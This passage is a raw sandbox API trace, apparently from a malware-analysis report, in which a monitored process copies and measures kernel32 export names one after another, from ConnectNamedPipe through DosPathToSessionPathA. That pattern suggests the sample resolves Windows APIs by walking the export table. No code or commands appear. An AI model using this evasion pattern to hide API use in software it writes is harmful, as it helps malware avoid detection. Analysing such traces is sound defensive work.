returned="ConnectNamedPipe" [0181.684] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0181.684] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0181.684] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0181.684] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0181.684] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0181.684] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0181.684] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0181.684] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0181.684] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0181.684] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0181.684] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0181.684] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0181.684] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0181.684] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0181.684] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0181.684] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0181.685] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0181.685] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0181.685] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0181.685] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0181.685] lstrlenA (lpString="COPYCONTEXT") returned 11 [0181.685] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0181.685] lstrlenA (lpString="COPYFILEA") returned 9 [0181.685] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0181.685] lstrlenA (lpString="COPYFILEEXA") returned 11 [0181.685] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0181.685] lstrlenA (lpString="COPYFILEEXW") returned 11 [0181.685] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0181.685] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0181.685] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0181.685] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0181.685] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0181.685] lstrlenA (lpString="COPYFILEW") returned 9 [0181.685] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0181.685] lstrlenA (lpString="COPYLZFILE") returned 10 [0181.685] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0181.685] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0181.685] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0181.685] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0181.685] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0181.685] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0181.685] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0181.685] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0181.685] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0181.685] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0181.685] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0181.685] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0181.685] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0181.685] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0181.685] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0181.685] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0181.686] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0181.686] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0181.686] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0181.686] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0181.686] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0181.686] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0181.686] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0181.686] lstrlenA (lpString="CREATEEVENTA") returned 12 [0181.686] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0181.686] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0181.686] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0181.686] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0181.686] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0181.686] lstrlenA (lpString="CREATEEVENTW") returned 12 [0181.686] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0181.697] lstrlenA (lpString="CREATEFIBER") returned 11 [0181.697] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0181.697] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0181.697] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0181.697] lstrlenA (lpString="CREATEFILEA") returned 11 [0181.697] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0181.697] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0181.697] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0181.697] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0181.697] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0181.697] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0181.697] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0181.697] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0181.697] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0181.697] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0181.697] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0181.697] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0181.697] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0181.697] lstrlenA (lpString="CREATEFILEW") returned 11 [0181.697] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0181.697] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0181.697] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0181.697] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0181.697] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0181.698] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0181.698] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0181.698] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0181.698] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0181.698] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0181.698] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0181.698] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0181.698] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0181.698] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0181.698] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0181.698] lstrlenA (lpString="CREATEJOBSET") returned 12 [0181.698] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0181.698] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0181.698] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0181.698] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0181.698] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0181.698] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0181.698] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0181.698] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0181.698] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0181.698] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0181.698] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0181.698] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0181.698] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0181.698] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0181.698] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0181.698] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0181.698] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0181.698] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0181.698] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0181.698] lstrlenA (lpString="CREATEPIPE") returned 10 [0181.698] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0181.698] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0181.698] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0181.698] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0181.699] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0181.699] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0181.699] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0181.699] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0181.699] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0181.699] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0181.699] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0181.699] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0181.699] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0181.699] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0181.699] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0181.699] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0181.699] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0181.699] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0181.699] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0181.699] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0181.699] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0181.699] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0181.699] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0181.699] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0181.699] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0181.699] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0181.699] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0181.699] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0181.699] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0181.699] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0181.699] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0181.699] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0181.699] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0181.699] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0181.699] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0181.699] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0181.699] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0181.699] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0181.699] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0181.700] lstrlenA (lpString="CREATETHREAD") returned 12 [0181.700] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0181.700] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0181.700] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0181.700] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0181.700] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0181.700] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0181.700] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0181.700] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0181.700] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0181.700] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0181.700] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0181.700] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0181.700] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0181.700] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0181.700] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0181.700] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0181.700] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0181.700] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0181.700] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0181.700] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0181.700] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0181.700] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0181.700] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0181.700] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0181.700] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0181.700] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0181.700] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0181.700] lstrlenA (lpString="CTRLROUTINE") returned 11 [0181.700] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0181.700] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0181.700] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0181.700] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0181.700] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0181.700] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0181.701] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0181.701] lstrlenA (lpString="DEBUGBREAK") returned 10 [0181.701] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0181.701] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0181.701] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0181.701] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0181.701] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0181.701] lstrlenA (lpString="DECODEPOINTER") returned 13 [0181.701] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0181.701] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0181.701] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0181.701] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0181.701] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0181.701] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0181.701] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0181.701] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0181.701] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0181.701] lstrlenA (lpString="DELETEATOM") returned 10 [0181.701] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0181.701] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0181.701] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0181.701] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0181.701] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0181.701] lstrlenA (lpString="DELETEFIBER") returned 11 [0181.701] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0181.701] lstrlenA (lpString="DELETEFILEA") returned 11 [0181.701] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0181.701] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0181.701] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0181.701] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0181.701] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0181.701] lstrlenA (lpString="DELETEFILEW") returned 11 [0181.701] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0181.701] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0181.701] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0181.702] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0181.702] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0181.702] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0181.702] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0181.702] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0181.702] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0181.702] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0181.702] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0181.702] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0181.702] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0181.702] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0181.702] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0181.702] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0181.702] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0181.702] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0181.702] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0181.702] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0181.702] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0181.702] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0181.702] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0181.702] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0181.702] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0181.702] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0181.702] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0181.702] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0181.702] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") 